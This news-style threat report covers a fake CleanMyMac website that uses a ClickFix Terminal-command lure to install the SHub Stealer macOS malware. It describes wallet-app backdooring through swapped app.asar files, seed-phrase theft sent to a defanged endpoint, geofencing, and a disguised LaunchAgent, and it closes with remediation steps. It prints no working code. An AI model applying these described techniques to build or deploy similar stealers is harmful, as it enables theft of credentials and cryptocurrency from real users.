Cybercriminals Exploit Fake CleanMyMac Website to Deploy SHub Stealer and Compromise Cryptocurrency Wallets
In a sophisticated cyberattack, malicious actors have created a counterfeit website mimicking the popular Mac utility, CleanMyMac, to distribute a dangerous macOS malware known as SHub Stealer. This deceptive site, located at cleanmymacos[.]org, bears no affiliation with the legitimate CleanMyMac software or its developer, MacPaw.
The Deceptive Mechanism
The attackers employ a technique called ClickFix to deceive users into executing harmful commands. Visitors to the fraudulent site are prompted to open the Terminal application and input what appears to be a standard installation command. This command performs three critical actions:
1. Displays a counterfeit MacPaw link to enhance credibility.
2. Decodes a concealed base64 URL to obscure the actual destination.
3. Downloads and executes a malicious shell script from the attackers’ server.
Since users initiate this command themselves, macOS security features such as Gatekeeper, XProtect, and notarization checks are effectively bypassed, leaving systems vulnerable to infection.
Capabilities of SHub Stealer
Once installed, SHub Stealer exhibits a range of malicious functionalities:
– Data Harvesting: The malware collects sensitive information, including saved passwords, browser data, Apple Keychain contents, cryptocurrency wallet files, and Telegram session data.
– Geofencing Logic: Before executing its primary payload, SHub Stealer checks for the presence of a Russian-language keyboard. If detected, it signals the attackers’ server with a `cis_blocked` event and terminates without exfiltrating data. This behavior suggests an intent to avoid infecting systems in certain regions, likely to evade local law enforcement scrutiny.
– Per-Victim Tracking: The malware assigns unique identifiers to each infected system, enabling attackers to monitor and manage individual infections effectively.
Targeting Cryptocurrency Wallets
A particularly alarming aspect of SHub Stealer is its ability to compromise cryptocurrency wallet applications. The malware identifies specific wallet apps on the infected machine and replaces their core logic files with backdoored versions that appear and function normally but secretly exfiltrate credentials. The targeted applications include:
– Exodus
– Atomic Wallet
– Ledger Wallet
– Ledger Live
– Trezor Suite
These applications are built on Electron, a framework where the app’s behavior is defined in a file named `app.asar`. SHub Stealer terminates the running wallet application, downloads a modified `app.asar` from its command-and-control (C2) server, overwrites the original file, removes the existing code signature, and re-signs the application to ensure macOS accepts it.
Specific Attack Methods
– Exodus and Atomic Wallet: Configured to silently transmit the user’s password and seed phrase to `wallets-gate[.]io/api/injection` each time the wallet is unlocked.
– Ledger Wallet and Ledger Live: Disable TLS validation at startup and display a fake recovery wizard that collects the seed phrase before sending it to the same endpoint.
– Trezor Suite: Presents a full-screen overlay styled to match its real interface, prompting users with a fake security update that requests the seed phrase, validates it using the app’s own BIP39 library, and transmits it to the attackers.
All compromised applications exfiltrate data to the same `wallets-gate[.]io` endpoint using a consistent API key and build ID, indicating a single operator behind the attacks.
Establishing Persistent Access
To maintain long-term access to infected systems, SHub Stealer installs a background task named `com.google.keystone.agent.plist` in `~/Library/LaunchAgents/`, impersonating Google’s Keystone updater. This task runs every sixty seconds, allowing the attackers to execute remote commands continuously.
Immediate Actions for Affected Users
If you have executed the Terminal command from cleanmymacos[.]org, it is crucial to take the following steps immediately:
1. Cease Further Actions: If you have not yet run the command, do not proceed, and close the fraudulent page immediately.
2. Remove Malicious Launch Agent: Navigate to `~/Library/LaunchAgents/` and delete `com.google.keystone.agent.plist` if it exists.
3. Delete Malicious Application Support Files: Check `~/Library/Application Support/Google/` and remove the `GoogleUpdate.app` folder if present.
4. Secure Cryptocurrency Assets: If any of the targeted wallet applications were installed when the command was executed, consider your seed phrase compromised. Transfer your funds to a new wallet on a clean device, as seed phrases cannot be changed.
5. Change Credentials: From a trusted device, change your macOS login password and any credentials stored in the Keychain.
6. Revoke and Regenerate Keys: Revoke and regenerate any API keys or SSH keys found in your shell history files.
Conclusion
This incident underscores the importance of vigilance when downloading software and executing commands from unverified sources. Always ensure you are accessing official websites and be cautious of prompts that require manual command execution, as they may be attempts to bypass built-in security measures.
